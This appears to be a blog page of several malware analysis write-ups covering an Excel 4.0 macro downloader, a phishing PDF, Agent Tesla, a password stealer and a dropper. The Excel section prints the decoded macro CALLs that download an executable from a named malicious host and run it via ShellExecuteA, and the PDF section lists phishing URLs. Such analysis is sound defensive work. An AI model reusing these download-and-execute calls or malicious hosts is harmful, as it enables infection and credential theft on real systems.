Excel 4.0 macro Trojan Downloader – Malware Analysis

Anurag Gawande8 Comments

Hash: 89e62ec08b0b6065134c67937bae76ccd70163770fd6992574e41b9c82c3cf1c

Sample Download Link: beta.VirusBay.io

Application Name: Microsoft Excel

File Type: xls

VirusTotal Score: 29/60

Blg15_02052020_1

I came across this sample on VirusBay.io. I downloaded this malicious excel file on my VM for malware analysis.

OLEVBA.py

First thing I did analysis of VBA macro source code in excel file using OLETools.

Command > OLEVBA.py -a

Blg15_02052020_2

The result shows, macro will auto execute on opening file and it may run executable file may be using shell command and will download a file from remote server. The executable file name is FBpKzqF.exe

Document Property:

Blg15_02052020_3

XLM macro has been used in this file which is hidden.

Blg15_02052020_4

Steps To Make Macros Sheet Visible

Step 1

I enabled it by right click on the spreadsheet which is open in Excel and selected Unhide…

Blg15_02052020_6

And then a popup shows the name of spreadsheet I will select to unhide. Here name of sheet is SODXOFScMLy.

Blg15_02052020_7

Step 2

Along with this need to unblock the excel file and can be done by right click on excel file > General Tab > check option Unblock. I ran OLEVBA to check the visibility status of macro and now it turned to visible.

Blg15_02052020_21

While going through spreadsheet, I searched for keywords those I found in macro extracted using tool OLEVBA

OLEVBA macro extracted show a string value of C:\ProgramData\FBpKzqF.exe

Blg15_02052020_12

So I tried to look for .exe in spreadsheet, I was sure I will get something here and I found a link of a website  http:// gstat.dondyablo .com/ fattura.exe here fattura.exe is just a html page. (VirusTotal link here)

Blg15_02052020_11

Verification of above URL on VirusTotal shows URL is up and malicious and scores 17/79.

Blg15_02052020_13

I also did NSLookUp for URL. There are three IPs assigned to this site. First 2 from Russia and third one from Netherlands.

Blg15_02052020_14

Next I started looking for formula and Call functions in columns as I saw them in extracted macro by olevba.py. (screenshot below)

Blg15_02052020_22

I started with Call function, right click and run this call function.

Blg15_02052020_23

Click on Step in.

Blg15_02052020_24

Click on Evaluate will evaluate the values of parameters of call.

Blg15_02052020_25

Post Evaluation

=CALL($BZ$118,$HT$592, "JJCCJJ",0,$BB$54,$GI$1025,0,0)
Blg15_02052020_26

Here the value of

$BZ$118 = “URLMON”

$HT$559 = “URLDownloadToAFile”

$BB$54 = http:// gstat.dondyablo .com/ fattura.exe”

$GI$1024 = “C:\ProgramData\FBpKzqF.exe”

call("URLMON","URLDownloadToAFile","JJCCJJ",0,
"http:// gstat.dondyablo .com/ fattura.exe", 
"C:\ProgramData\FBpKzqF.exe")

There is another call function, I am evaluating to get the value of this call function.

=CALL($H$24,$GD$694, "JJCCCCJ",0,$I$1161,$GI$1025,,0,0)
Blg15_02052020_27

$H$24 = “Shell32”

$GD$694 = “ShellExecuteA”

$I$1161 = “open”

$GI$1025= “C:\ProgramData\FBpKzqF.exe”

=Call("Shell32", "ShellExecuteA", "JJCCJJ", 
"open", "C:\ProgramData\FBpKzqF.exe",,0,0)

Looking at these two call functions, I can say

  • The first call function will download the executable file from the URL
  • The second call function will execute the executable file on victims machine.

Next I will test, enable Internet on my VM and will run first call function instead of step in which will download the executable.

Network Log: 

Network log shows connection made to IP address 195. 22. 152. 76 and IP address resolved to DNS gstat. dondyablo .com

Blg15_02052020_31

Below image shows, it is downloaded ms dos application.

Blg15_02052020_35
Blg15_02052020_33

URL is hosted on Apache server and host server is Ubuntu.

Blg15_02052020_28

Process Explorer: 

Process explorer capture the TCP connection with remote IP address and download the executable file at two location

  • C:\ProgramData\FBpKzqF.exe
  • CC:\Users\IEUser\AppData\Local\Microsoft\Windows\INetCache\IE\LQ86GWLO\fattura[1].exe (temp location)
Blg15_02052020_32
Blg15_02052020_30

Downloaded Executable File Information

File name: FBpKzqF.exe

File Type: Win32 EXE

Hash: cddf3cc072913f9e5b0a020b12a0d80184b34a82f6ea6f8f7e95475a87de268c

VirusTotal Score: 50/70

Blg15_02052020_34

Summary

  • Excel file is Excel 4.0 macro in hidden spreadsheet (SODXOFScMLy)
  • Macro call functions download executable FBpKzqF.exe
  • “http:// gstat.dondyablo .com/ fattura.exe” from where executable downloaded.
  • downloaded executable file is a trojan malware.

PDF malware analysis

Anurag Gawande2 Comments

Hash: d26a7e67cda125f11270af0a820f6644cf920ed70fd5b166e82757dabb6d1ee0

Download sample link: Here

File type: PDF

VirusTotal score: 27/54

Blg14_300420202_2

PDF Document Preview

Blg14_300420202_18

PDFiD

I have used PDFiD tool to analyse the header of pdf file. Observed file contains 24 URL’s.

Blg14_300420202_1

Next step is to extract URL’s from the document. I will use two tools here to perform this, pdf-parser and PDFStreamDumper.

pdf-parser

I am using pdf-parser tool to extract only the list of URL’s from this document. for that I am navigating to the pdf-parser folder and executing command. pdf-parser is python script.

pdf-parser.py -k /URI <.pdf file> 

Blg14_300420202_11

There are these 5 URLs extracted from the pdf document.

(http://www.diamondcreationslb . com/doc/rdd.htm)
(http://ruseuropharm . ru/tobi/index.php)
(http://tcil-bd . com/tin-count/zigi/index.php)
(http://tcil-bd . com/wp-includes/IXR/alen/index.php)
(http://tcil-bd . com/dfp/index.php)

PDFStreamDumper

PDFStreamDumper is very handy tool with GUI. This loads all objects in PDF file and show in Text, Hex format. Opening malicious pdf file in PDFStreamDumper, I can see URL’s under objects. To get all the URL’s I will have to go through all objects from the left panel one by one.

E.g.

Blg14_300420202_12

URL Verification

http://www.diamondcreationslb . com/doc/rdd.htm

Report : Phishing

Blg14_300420202_13

http://ruseuropharm . ru/tobi/index.php

Report: Phishing

Status: 404

Blg14_300420202_14

http://tcil-bd . com/tin-count/zigi/index.php

Report: Phishing

Status: 404

Blg14_300420202_15

http://tcil-bd . com/wp-includes/IXR/alen/index.php

Report: Phishing

Status: 404

Blg14_300420202_16

http://tcil-bd . com/dfp/index.php

Report: Phishing

Status: 404

Blg14_300420202_17

Summary:

  • PDF File has URL’s embedded.
  • All URLs are phishing.

Trojan Agent Tesla – Malware Analysis

Anurag Gawande4 Comments

Hash – 077f75ef7fdb1663e70c33e20d8d7c4383fa13fd95517fab8023fce526bf3a25

Family : Agent Tesla

Downloaded Sample Link: Click here

Signature: Microsoft Visual C# v7.0/ Basic.NET

Filename: UIhLdVHHlUAKoEOpjVAsXFlIQrgS.exe

Blg9_30032020_81

VirusTotal score:

Blg9_30032020_82

Malware behavior:

  • Steal browser information (URL, Usernames, Passwords)
  • Steal passwords for email clients.
  • Steal FTP Clients
  • Steal download manager passwords.
  • Collect OS and hardware information.

Browser Information:

When I debug the malware executable, Initially it creates a SQLite database to store collected information from victims machine.

Below are the tables getting created.

Blg9_30032020_26
Blg9_30032020_83
Blg9_30032020_28

Tables created:

  • meta
  • logins
  • sqlite_sequence
  • stats
  • compromised_credentials

found it collected browsers data (Google chrome), that includes accessed URLs and related usernames and passwords.

Blg9_30032020_29

database table logins stores all browser related information. Below are the table columns.

Blg9_30032020_30
Blg9_30032020_47

Apart from this, malware also look for all different types of browsers to steal data from it.

It look for below browsers:

  • Opera Browser
  • Yandex Browser
  • 360 Browser
  • Iridium Browser
  • Comodo Dragon
  • Cool Novo
  • Chromium
  • Torch Browser
  • 7Star
  • Amigo
  • Brave
  • CentBrowser
  • Chedot
  • Coccoc
  • Elements Browser
  • Epic Privacy
  • Kometa
  • Orbitum
  • Sputnik
  • Uran
  • Vivaldi
  • Citrio
  • Liebao Browser
  • Sleipnir 6
  • QIP Surf
  • Coowon
Blg9_30032020_11

Below screenshot taken while debugging malware.

Blg9_30032020_50

Malware also look for below email clients. I haven’t install any of them on my machine during analyzing this.

Email Clients:

  • Outlook
  • Thunderbird
  • Foxmail
  • Opera Mail
  • Pocomail
  • Claws-mail
  • Postbox
Blg9_30032020_12
Blg9_30032020_84

FTP Clients:

Malware grabs credentials from FTP clients as well. Below list.

  • FileZilla
  • Core FTP
  • SmartFTP
  • FTPGetter
  • FlashFXP
Blg9_30032020_76
Blg9_30032020_75

It also makes FTP web request. (Remote Server couldn’t find)

Blg9_30032020_90
Blg9_30032020_91

It uses smtp client to send information over the network using port 587 which indicates sending data from smtp client to a particular smtp Server through mail attachments.

Blg9_30032020_85
Blg9_30032020_86

Malware executable also make HTTPWebRequest which must be downloading SMTP client to transfer data to remote SMTP server.

Blg9_30032020_89

unfortunately, it didn’t make any connection to any remote server address.

Summary:

  • Steal Browser Information including urls, usernames and passwords.
  • Steal email client credentials.
  • Steal credentials of FTP servers.
  • Computer information.

Thank you.

Password stealer Trojan – Malware Analysis

Anurag Gawande3 Comments

Hi Visitor, I got this sample of malware shared on VirusBay.

Sample below:

SHA256: 630efa1e2dc642799b867363bb36d1953884480ac29942a1ab20243a8a9620ad

Signature: Microsoft Visual C# v7.0/ Basic .Net and its a Windows forms application.

blg_03222020_9

Upon execution, this file drops below two files at location C:\Users\<UserProfile>\AppData\Local\Temp\

Dropped files:

C:\Users\<UserProfile>\AppData\Local\Temp\FB_2C02.tmp.exe

C:\Users\<UserProfile>\AppData\Local\Temp\cc3a68ce1dad95ce662e1c51568e3a.exe (Application Server)

blg_03222020_10
blg_03222020_11
blg_03222020_7

Upon execution of this file, it take a screenshot of current screen and save at C:\Users\<UserProfile>\AppData\Local\Temp location.

Also it adds below file to startup programs.

  • cc3a68ce1dad95ce662e1c51568e3a.exe (Application Server)
  • And main malware sample file.
blg_03222020_14

FB_2C02.tmp.exe:

SHA256: A02CF7E4D01C3E04C0C6F723A541289A12C5D87ECC47F6B675D84A6B1B0A23B3

File description: Gomorrah

Signature: Microsoft Visual C# v7.0/ Basic .Net and its a Windows forms application.

I used ILSpy decompiler to decompile FB_2C02.tmp.exe. I could see the functions written to achive below purpose.

Purpose:

  1. Steal browser saved user account information.
blg_03222020_5

I used google chrome on which VM i was doing analysis. I could see this file has created a Passwords.txt file at C:\Users\<UserProfile>\AppData\Local\Temp\Passwords.txt

blg_03222020_15
blg_03222020_13

Decomplied code of executable which grab google chrome url, username and password.

blg_03222020_8

2. System Information.

This file also located at C:\Users\<UserProfile>\AppData\Local\Temp

blg_03222020_4

3. Outlook Password.

This file also located at C:\Users\<UserProfile>\AppData\Local\Temp. As I wasnt using outlook, the file was empty.

blg_03222020_17

4. Credit Card information

This file CC.txt which stores information about CC also located at C:\Users\<UserProfile>\AppData\Local\Temp.

It was empty too.

Below code grab CC information from the browser.

blg_03222020_18

Just not from Google chrome but from all below,

  • Amigo
  • Brave
  • Kometa
  • Orbitium
  • Totch
  • Yandex
blg_03222020_7

It uploads all collected to the remote location. Though I am not able to see it is connecting to remote server anymore because when I ran this, got run time exceptions.

But it gets connected to below URL as its mentioned on VirusTotal detection.

blg_03222020_19

Summary:

Malware upload below information to remote server.

  • Web account passwords from web browsers.
  • Credit card information from web browser.
  • Outlook passwords.
  • Client machine information.

Thank you.

Trojan dropper bdf243b7a296f7aecc366c799e3fb865e 3aff7c72d8d942e2b2632a347fe5c3

Anurag GawandeLeave a comment

SHA256: bdf243b7a296f7aecc366c799e3fb865ee3aff7c72d8d942e2b2632a347fe5c3

I downloaded this sample from Malshare.

I started decoding PE hex to text file and found that the PE file has embedded another file which will be dropped on execution.

blg7-wp-12

Filename: help.exe

SHA256: 837bef64239be017a2aac92852576efc7d84774d90f64e9d69c5cc3a2b4ecce4

It also drops Autoexec.bat.exe file and Autoexec.exe files at C:\ location. (But it didn’t drop these files instead it dropped AutoRun.INF and AutoRun.exe)

blg7-wp-9.PNG
blg7-wp-8.PNG

Also found computer username emartinez in path to PDB file, that means this file must be compiled on a machine under this user account.

blg7-wp-3.PNG

and username janettedoe in another path to startup programs

blg7-wp-14.PNG

I executed this PE file for dynamic analysis. I found this file dropped Helpme.exe, AutoRun.INF same location I have seen in hex code.

Files Dropped:

  1. C:\Windows\System32\HelpMe.exe
  2. C:\AutoRun.INF
  3. C:\AutoRun.exe

Screenshots

blg7-wp-23.PNG

AUTORUN.INF file at location C:\ 

AUTORUN.INF file executes executable AutoRun.exe file. (Below screenshot)

blg7-wp-27.PNG
blg7-wp-34

Another executable dropped at below location

C:\$Recycle.Bin\S-1-5-18

C:\$Recycle.Bin\S-1-5-21-3461203602-4096304019-2269080069-100

blg7-wp-31.PNG
blg7-wp-32

I did rename C:\$Recycle.Bin\S-1-5-18\desktop.ini file to desktop.ini.exe and double click to execute it. It has given error Cannot create file “C:\Windows\System32\HelpMe.exe 

blg7-wp-33.PNG

Then I executed desktop.ini.exe file with administrative privilege (before execute this file I had commented AutoRun.exe file at location C:\) and this file executed C:\Windows\System32\HelpMe.exe which dropped file AutoRun.exe at location C:\

blg7-wp-34

I disassembled AutoRun.exe file and found this creates file Soft.lnk which again has path to execute HelpMe.exe on windows startup.

blg7-wp-35.PNG

Below soft.lnk has comment Stone, I hate you! this file has target to execute AUTORUN.INF.exe

blg7-wp-22

No internet connectivity has been tested from this malware, as this analysis done offline.